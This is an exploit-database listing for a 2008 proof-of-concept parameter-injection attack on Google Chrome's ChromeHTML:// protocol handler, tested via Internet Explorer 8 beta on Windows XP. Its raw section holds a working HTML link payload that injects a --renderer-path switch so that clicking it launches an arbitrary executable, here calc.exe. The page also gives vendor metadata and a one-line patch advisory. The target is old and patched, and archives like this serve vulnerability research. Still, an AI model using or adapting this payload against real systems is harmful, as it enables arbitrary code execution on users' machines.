header-logo
Suggest Exploit
vendor:
Chrome
by:
Nine:Situations:Group::bellick&strawdog
7.5
CVSS
HIGH
Remote Parameter Injection
94
CWE
Product Name: Chrome
Affected Version From: Google Chrome 1.0.154.36
Affected Version To: Internet Explorer 8 beta 2
Patch Exists: Yes
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2008

Google Chrome Browser (ChromeHTML://) remote parameter injection POC

A proof-of-concept exploit was released for Google Chrome Browser (ChromeHTML://) remote parameter injection. The exploit was tested against Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, and Microsoft Windows XP SP3. The exploit was released by Nine:Situations:Group::bellick&strawdog and was hosted on the website http://retrogod.altervista.org/. The exploit was released on 2008-12-23.

Mitigation:

Users should update their Google Chrome Browser to the latest version to ensure that the vulnerability is patched.
Source

Exploit-DB raw data:

<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

# milw0rm.com [2008-12-23]

Navigation

Suggest Exploit

Services By CQR